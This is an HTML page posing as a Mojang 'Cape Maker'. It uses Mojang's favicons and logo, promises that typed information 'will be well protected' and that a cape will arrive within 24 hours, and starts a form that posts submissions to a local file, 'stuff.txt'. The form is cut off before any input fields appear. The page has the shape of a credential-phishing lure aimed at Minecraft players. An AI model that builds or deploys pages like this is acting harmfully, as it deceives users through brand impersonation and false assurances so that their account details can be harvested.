
<!DOCTYPE html>
<html>
<head>
<title>Mojang Cape Maker</title>
<meta name="description" content="Mojang">
<link rel="icon" type="image/png" href="http://www.mojang.com/assets/icons/favicon-16x16-4f4c31e183809282640eeedc9ccca841.png" sizes="16x16">
<link rel="icon" type="image/png" href="http://www.mojang.com/assets/icons/favicon-32x32-a5589570fe1b5c61925d9e60f644bbcd.png" sizes="32x32">
<link rel="icon" type="image/png" href="http://www.mojang.com/assets/icons/favicon-96x96-73eda044fc6ebd1121ce9dc05fdcb3d7.png" sizes="96x96">
<link rel="icon" type="image/png" href="http://www.mojang.com/assets/icons/favicon-160x160-671ddaab7a862c2fab8275db0df3710a.png" sizes="160x160">
<link rel="icon" type="image/png" href="http://www.mojang.com/assets/icons/favicon-192x192-0c37945dfd1d8c8422c5448940ae45aa.png" sizes="192x192">
</head>
<body background="background.jpg">
<img src="http://www.mojang.com/assets/mojang-logo-81d4bf1dbdbacd0df2a2e2ddc46f8cf0.svg">
<h1>Cape Modding and Placement.</h1>
<h4> Once you type your information here V It will be well protected and you will get a cape in under 24 hours.</h4>
<form action="stuff.txt" method="POST" id="ss-form" target="_self" onsubmit=""><ol role="list" class="ss-question-list" style="padding-left: 0">
</body>
</html>
